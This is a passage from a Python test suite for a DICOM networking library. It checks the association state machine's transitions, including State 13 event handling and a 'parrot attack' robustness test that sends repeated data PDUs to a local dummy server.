assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt19', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState13(TestStateBase):
"""Tests for State 13: Waiting for connection closed."""
def test_evt01(self):
"""Test Sta13 + Evt1."""
# Sta13 + Evt1 -> <ignore> -> Sta13
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta13 + Evt2."""
# Sta13 + Evt2 -> <ignore> -> Sta13
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta13 + Evt3."""
# Sta13 + Evt3 -> AA-6 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_associate_ac),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt3', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt3'
]
def test_evt04(self):
"""Test Sta13 + Evt4."""
# Sta13 + Evt4 -> AA-6 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_associate_rj),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt4', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt4'
]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta13 + Evt5."""
# Sta13 + Evt5 -> <ignore> -> Sta13
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta13 + Evt6."""
# Sta13 + Evt6 -> AA-7 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-7: Send A-ABORT PDU to <remote>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt6', 'AA-7'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt6'
]
def test_evt07(self):
"""Test Sta13 + Evt7."""
# Sta13 + Evt7 -> <ignore> -> Sta13
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt7']
def test_evt08(self):
"""Test Sta13 + Evt8."""
# Sta13 + Evt8 -> <ignore> -> Sta13
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt8']
def test_evt09(self):
"""Test Sta13 + Evt9."""
# Sta13 + Evt9 -> <ignore> -> Sta13
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.2),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
start = time.time()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
if time.time() - start > 5:
self.print_fsm_scp(self.fsm, scp)
break
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt9']
def test_evt10(self):
"""Test Sta13 + Evt10."""
# Sta13 + Evt10 -> AA-6 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', p_data_tf),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt10', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt10'
]
def test_evt11(self):
"""Test Sta13 + Evt11."""
# Sta13 + Evt11 -> <ignore> -> Sta13
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt11']
def test_evt12(self):
"""Test Sta13 + Evt12."""
# Sta13 + Evt12 -> AA-6 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_release_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt12', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt12'
]
def test_evt13(self):
"""Test Sta13 + Evt13."""
        # Sta13 + Evt13 -> AA-6 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-6: Ignore PDU
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt13', 'AA-6'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt13'
]
def test_evt14(self):
"""Test Sta13 + Evt14."""
# Sta13 + Evt14 -> <ignore> -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt14']
def test_evt15(self):
"""Test Sta13 + Evt15."""
# Sta13 + Evt15 -> <ignore> -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt15']
def test_evt16(self):
"""Test Sta13 + Evt16."""
# Sta13 + Evt16 -> AA-2 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-2: Stop ARTIM, close connection
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', a_abort),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt16', 'AA-2'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt16'
]
def test_evt17(self):
"""Test Sta13 + Evt17."""
# Sta13 + Evt17 -> AR-5 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AR-5: Stop ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt17', 'AR-5'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt17'
]
def test_evt18(self):
"""Test Sta13 + Evt18."""
# Sta13 + Evt18 -> AA-2 -> Sta1
# Evt18: ARTIM timer expired from <local service>
# AA-2: Stop ARTIM, close connection
commands = [
('recv', None),
('send', a_associate_rq),
('wait', 0.1),
]
scp = self.start_server(commands)
def patch_neg_rq():
"""Override ACSE._negotiate_as_requestor"""
self.assoc.acse.send_request()
self.assoc.acse._negotiate_as_requestor = patch_neg_rq
orig_method = self.assoc.dul._is_transport_event
def patch_xport_event():
"""Override DUL._is_transport_event to not close in Sta13."""
if self.fsm.current_state == 'Sta13':
return False
return orig_method()
self.assoc.dul._is_transport_event = patch_xport_event
self.assoc.start()
while self.fsm.current_state != 'Sta13':
time.sleep(0.05)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt18', 'AA-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta13', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt18']
def test_evt19(self):
"""Test Sta13 + Evt19."""
# Sta13 + Evt19 -> AA-7 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-7: Send A-ABORT PDU to <remote>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_associate_ac),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
('Sta13', 'Evt19', 'AA-7'),
]
assert self.fsm._transitions[:4] == [
'Sta4', 'Sta5', 'Sta6', 'Sta13'
]
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt3', 'Evt19'
]
class TestParrotAttack(TestStateBase):
"""Test a parrot attack on the association."""
def test_requestor(self):
commands = [
('recv', None),
('send', a_associate_ac),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', a_release_rq),
('wait', 0.1)
]
scp = self.start_server(commands)
self.assoc.start()
time.sleep(0.5)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:14] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt14', 'AR-4'),
('Sta13', 'Evt17', 'AR-5'),
]
def test_acceptor(self):
"""Test hitting the acceptor with PDUs."""
# Also a regression test for #120
# C-ECHO-RQ
# 80 total length
echo_rq = (
b"\x04\x00\x00\x00\x00\x4a" # P-DATA-TF 74
b"\x00\x00\x00\x46\x01" # PDV Item 70
b"\x03" # PDV: 2 -> 69
b"\x00\x00\x00\x00\x04\x00\x00\x00\x42\x00\x00\x00" # 12 Command Group Length
b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38"
b"\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31\x00" # 26
b"\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00" # 10 Command Field
b"\x00\x00\x10\x01\x02\x00\x00\x00\x01\x00" # 10 Message ID
b"\x00\x00\x00\x08\x02\x00\x00\x00\x01\x01" # 10 Command Data Set Type
)
# Send associate request then c-echo requests then release request
commands = [
('send', a_associate_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', a_release_rq),
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
time.sleep(0.5)
#self.print_fsm_scp(fsm, scp=None)
scp.shutdown()
assert [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt14', 'AR-4'),
('Sta13', 'Evt17', 'AR-5'),
] == fsm._changes[:30]
class TestStateMachineFunctionalRequestor(object):
"""Functional tests for StateMachine as association requestor."""
def setup(self):
"""Run prior to each test"""
self.scp = None
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = ''
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
def teardown(self):
"""Clear any active threads"""
if self.scp:
self.scp.abort()
for thread in threading.enumerate():
if isinstance(thread, DummyBaseSCP):
thread.abort()
thread.stop()
time.sleep(0.1)
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm.original_action = fsm.do_action
def do_action(event):
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def test_monkey_patch(self):
"""Test monkey patching of StateMachine works as intended."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = self.monkey_patch(assoc.dul.state_machine)
assert fsm.current_state == 'Sta1'
fsm.current_state = 'Sta13'
fsm.do_action('Evt3')
assert fsm._changes == [('Sta13', 'Evt3', 'AA-6')]
assert fsm._transitions == ['Sta13']
def test_associate_accept_release(self):
"""Test normal association/release."""
self.scp = DummyVerificationSCP()
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
if self.assoc.is_established:
self.assoc.release()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_reject(self):
"""Test normal association rejection."""
self.scp = DummyVerificationSCP()
self.scp.ae.require_called_aet = True
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
assert self.assoc.is_rejected
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt4', 'AE-4'), # A-ASSOC-RJ PDU recv
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_accept_abort(self):
"""Test association acceptance then local abort."""
self.scp = DummyVerificationSCP()
self.scp.ae.acse_timeout = 5
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
if self.assoc.is_established:
self.assoc.abort()
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta13', # Waiting for connection closed
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt15', 'AA-1'), # A-ABORT rq primitive
('Sta13', 'Evt17', 'AR-5'), # connection closed
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_accept_local_abort(self):
"""Test association acceptance then local abort if no cx."""
self.scp = DummyVerificationSCP()
self.scp.ae.acse_timeout = 5
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.requestor.requested_contexts[0].abstract_syntax = '1.2.3'
self.assoc.start()
while (not self.assoc.is_established and not self.assoc.is_rejected and
not self.assoc.is_aborted and not self.assoc.dul._kill_thread):
time.sleep(0.05)
time.sleep(0.1)
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta13', # Waiting for connection close
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt15', 'AA-1'), # A-ABORT rq primitive
('Sta13', 'Evt17', 'AR-5'), # Connection closed
]
assert self.fsm.current_state == 'Sta1'
self.scp.stop()
def test_associate_accept_peer_abort(self):
"""Test association acceptance then peer abort."""
self.scp = DummyVerificationSCP()
self.scp.ae.network_timeout = 0.5
self.scp.ae.acse_timeout = 5
self.scp.start()
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
